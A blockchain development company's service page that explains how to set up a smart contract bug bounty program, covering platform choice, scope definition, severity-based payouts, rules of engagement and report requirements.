Post-deploy smart contract monitoring

We design and develop full-cycle blockchain solutions: from smart contract architecture to launching DeFi protocols, NFT marketplaces and crypto exchanges. Security audits, tokenomics, integration with existing infrastructure.

8+Years of workmore info 900+Completed projectsmore info 100+In house employeesmore info 19+Partnersmore info

Offered services

Showing 1 of 1 servicesAll 1306 services

Medium

from 1 business day to 3 business days

FAQ

Blockchain Development Services

Discuss your blockchain project

Free consultation — we will show how blockchain can solve your challenge

Get a quote

We will estimate the budget and timeline for your blockchain project

Blockchain Development Stages

Latest works

B2B ADVANCE company website development
1214
Development of a web application for FEEDME
1161
Website development for BELFINGROUP
852
Development of an online store for the company FURNORO
1041
B2B Advance company logo design
561
Development of a web application for Enviok
823

Show more works

Setup of Bug Bounty for Smart Contracts

Bug bounty is continuous vulnerability rewards program launched after audit. Audit — security snapshot at deployment. Bug bounty — continuous process for protocol lifetime. Major DeFi protocols pay $50K to $10M for critical findings: Ethereum Foundation — up to $250K, Uniswap — up to $15.5M, MakerDAO — up to $10M.

Program setup not complex technically, but requires clear scope, rules, and rewards.

Main platforms

Immunefi — largest DeFi-specialized platform. $100M+ paid since launch. Specializes in smart contracts and blockchain. Integrated with most DeFi protocols. Commission: 10% of bounties paid.

HackerOne — general bug bounty platform with large community. Less specialized in DeFi but has verified web3 researchers. Good if protocol also has web2 components (API, frontend).

Code4rena and Sherlock — audit contests, not classic bug bounty. But Sherlock provides insurance coverage against exploits, which may be more valuable than bounty for some protocols.

For DeFi protocol: Immunefi — standard choice.

Program structure

Scope

Clearly define in-scope and out-of-scope. Example:

In scope (smart contracts):

All contracts at addresses [list] on Ethereum mainnet
Contracts on Arbitrum [addresses]

Out of scope:

Frontend bugs (XSS, phishing)
Centralized infrastructure (servers, databases)
Already known issues (link to public audit report)
Bugs requiring physical device access
Vulnerabilities in dependencies (OpenZeppelin, Chainlink)

Severity classification and payouts

Severity	Criteria	Payout
Critical	Direct user fund theft/loss	$50K - $200K
High	Significant damage under certain conditions	$10K - $50K
Medium	Limited damage, complex conditions	$1K - $10K
Low	Minor impact	$100 - $1K

Payouts proportional to TVL. Protocol with $10M TVL and max bounty $5K won't attract serious researchers. Standard: critical bounty = 10% of maximum possible damage, minimum $50K for production protocol.

Rules of Engagement

No public disclosure until fix and confirmation (responsible disclosure)
No DoS/disruption of real protocol when testing (use fork or testnet)
First reporter wins — if two report same vulnerability, first by timestamp gets reward
KYC requirement for payouts above threshold (usually $10K) — AML compliance
Forbidden to use found vulnerability for personal gain before reporting

Report requirements

Good report must contain:

Vulnerability description and impact
Reproducible proof of concept (Foundry test or script)
Proposed fix

Immunefi provides template. Incomplete reports without PoC — lowest priority.

After launch

Respond to reports within 48 hours. Long silence — bad reputation in researcher community. Payouts through Immunefi handled by platform (stablecoins or native token by researcher choice).

Launching on Immunefi: create account → fill scope → set budget → Immunefi verifies → publish. Takes 1-2 weeks from submission to publication.